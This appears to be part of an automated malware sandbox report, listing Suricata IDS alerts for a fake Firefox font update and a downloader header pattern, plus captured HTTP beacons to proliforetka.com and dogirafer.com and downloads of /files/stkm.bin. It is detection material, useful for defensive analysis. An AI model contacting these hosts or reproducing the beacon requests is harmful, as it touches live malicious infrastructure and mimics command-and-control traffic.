            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50013 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50041 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50024 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50042 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50034 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50049 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50035 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50046 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49999 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49935 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50047 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50012 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50005 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50039 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50037 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50019 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50036 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49978 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50001 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49989 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49965 -> 104.21.16.1:443
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX1MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.com
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXxMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXwMtB7wWZOVXnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcAtkDLcBiGr4ixbRT8User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 360Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXzMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DXyMtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX9MtB7wWZOVG6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+Nq4Lvk7QYx+FuNT8YRY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 12248Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX8MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0JIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0JYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0JoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0J4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0IIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0IYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0IoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0I4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0LIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX0LYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3JIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3JYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3JoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3J4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3IIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3IYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3IoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3I4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3LIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX3LYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2JIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2JYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2JoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2J4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2IIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2IYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2IoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2I4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2LIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: zQQrf4YZ+DX2LYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQfUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: proliforetka.comContent-Length: 0Cache-Control: no-cache
